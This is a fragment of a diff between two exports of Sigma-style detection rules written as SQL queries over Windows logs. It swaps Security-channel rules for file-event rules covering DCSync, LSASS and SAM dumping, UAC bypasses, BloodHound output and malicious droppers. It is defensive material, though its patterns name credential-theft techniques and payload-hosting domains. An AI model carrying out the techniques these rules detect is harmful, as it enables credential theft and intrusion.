"file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "attack.credential_access", + "attack.t1003.002" ], - "filename": "win_terminalservices_rdp_ngrok.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" + "Rare cases of administrative activity" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "description": "Detects windows executables that writes files with suspicious extensions", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": 